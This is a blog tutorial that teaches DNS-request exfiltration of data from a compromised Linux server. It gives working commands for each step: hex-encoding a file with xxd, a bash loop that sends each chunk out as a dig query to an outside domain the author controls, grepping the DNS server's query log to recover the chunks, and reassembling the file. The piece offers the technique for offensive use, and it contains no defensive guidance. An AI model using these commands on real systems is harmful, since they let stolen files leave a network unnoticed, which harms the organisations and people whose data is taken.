In this installment of Hack All The Things we will be discussing how to leverage DNS requests to exfiltrate data from a server. Note that while this is on on a Linux “victim” the same can be done in Windows using VBScript, Powershell, and even the fairly limited cmd.exe command prompt.
What is it?
While numerous methods of exfiltrating data exist to aid in the exfiltration of data during a plethora of scenarios, one method of exfiltration seems to work across the board : DNS Request-based Exfiltration. Leveraging remote controlled DNS servers an attacker can exfiltrate basically any data he wants from a compromised host.
How does it work?
The idea is simple, encode your raw data, make dig requests to a remote server you control, parse the logs on the remote server and reassemble the file.
How to do it
There are four main steps to this technique: Conversion, Transmission, Recovery, Reassembly. Let’s go over these one-by-one while illustrating the workflow.
We’ve got to convert data over for a number of reasons but the biggest reason being size; sending a 4mb string as a DNS query is more than likely going to fail so we wanna get nice digestible chunks. Another good reason for converting is so that we can transfer purely binary data to exfiltrate even things like executables and the like. For this step I swear by the tool “xxd” which will take a file (or string) and convert it to nicely formatted hex.
10:17:28 [email protected]:[~/exfil]$ ls
drwxr-xr-x 3 connection staff 102B Feb 13 10:16 ./
drwxr-xr-x+ 206 connection staff 6.8K Feb 13 10:16 ../
-rw-r--r-- 1 connection staff 72B Feb 13 10:17 importantInfo.txt
10:17:30 [email protected]:[~/exfil]$ cat importantInfo.txt
Hack All The Things.
I really hope no one steals this info :O
10:17:37 [email protected]:[~/exfil]$ xxd -p importantInfo.txt > exfilMe.hex
10:17:48 [email protected]:[~/exfil]$ head exfilMe.hex
Alright so in these command I’m simply showing the directory containing our file to be exfiltrated (named “importantInfo.txt”). The real magic happens with the ‘xxd’ command and I’ll break it down for you. The -p option tells xxd to dump out a continuous hex string without separating it with spaces or escape characters or anything funky like that. This is extremely useful as it allows us to fit the most data into a single chunk of info as possible. Next we use output redirection (the ‘>’ character) to save this output to a file called ‘exfilMe.hex’. Using the head command to view the first few lines of exfilMe.hex we can ensure that we infact have a bunch of hex that represents the data in ‘importantInfo.txt’
Conversion is now done, let’s move to…
This is one of my two favorite steps in this entire process, offloading the data to a remote server for collection. This next step is awesome because it leverages a quick little BASH script to send all our data over (if you haven’t been turned on to the pure awesomeness of BASH scripting yet you should go read BASH Scripting Will Save Your Life). Here is our script followed by an explanation.
for merp in `cat exfilMe.hex `; do dig $merp.exfil.hacktalk.net; done
What this does is iterates through every line in exfilMe.hex and assigns the line to the variable ‘merp’. The script then runs a ‘dig’ command (‘dig’ is used to make DNS request lookups) to the current value of merp.exfil.hacktalk.net . Some things to note is that the ‘.exfil’ portion of the request is just something I use to help sort out exfiltrated data from normal DNS requests and you can change it to whatever you want; secondarily the “hacktalk.net” portion is just there as I control that server, you would replace this with your own server information.
The recovery phase is in my opinion the worst phase for m in that I’m so close to having the data but I’m still one step away. Regardless, this step is the most crucial as without recovering the transmitted data all we effectively did was spam our own DNS server. Recovery is simple :
egrep -o "[0-9a-f]*.exfil.hacktalk.net" /var/log/query.log |cut -d. -f1 |uniq >> file.txt
Breaking this command down we understand how simple the recovery process really is. By using egrep (an alias of grep -E) we leverage the power of extended regex support in grep which allows us to use fun things like character ranges. In this case we are matching for the hex range of characters followed by ‘.exfil.hacktalk.net’ in the query.log file. We then use the ‘cut’ command to separate the hex data from the ‘exfil.hacktalk.net’ string. We use ‘uniq’ to ensure data maintains integrity as oftentimes a DNS query can be sent more than once if the sending server feels the request took too long. We then output this to file.txt for the next step,
This is hands-down my favorite part of this process, it lets me know I have my own copy of whatever juicy information I was trying to exfiltrate. This step is also extremely simple and leverages our old friend ‘xxd’ to convert hex back into it’s original data representation.
xxd -r -p < file.txt > gotEm
This command should seem mostly familiar but I’ll break it down incase it is unclear. Using the ‘-r’ flag of ‘xxd’ tells ‘xxd’ to reverse the process and basically “unhex” the data. We know the ‘-p’ flag just means that it’s a plain dump of hex with no fanciness thrown in. The next few commands may throw some people off so I’ll explain them as well. We know that ‘>’ outputs to a file so at the very least we know that our result will be in the file ‘gotEm’ but what does ‘<‘ do? Well, opposite to it’s outputting counterpart, ‘<‘ takes whatever you passed it and uses it as input. In this case it’s taking the contents of file.txt and passing it to xxd for reassembly and then being output to gotEm.
The Great Reveal
And now ladies and gentlemen, boys and girls, the moment you’ve all been waiting for!
[email protected]:~/dnsExfil# cat gotEm
Hack All The Things.
I really hope no one steals this info :O
CONVERT your file to hex using xxd
TRANSMIT your file to a remote server using a BASH for-loop and the dig command
RECOVER your data using grep
REASSEMBLE your data using xxd
I hope you’ve enjoyed this post and as always, Keep Your Hacks Up And Your Head Down™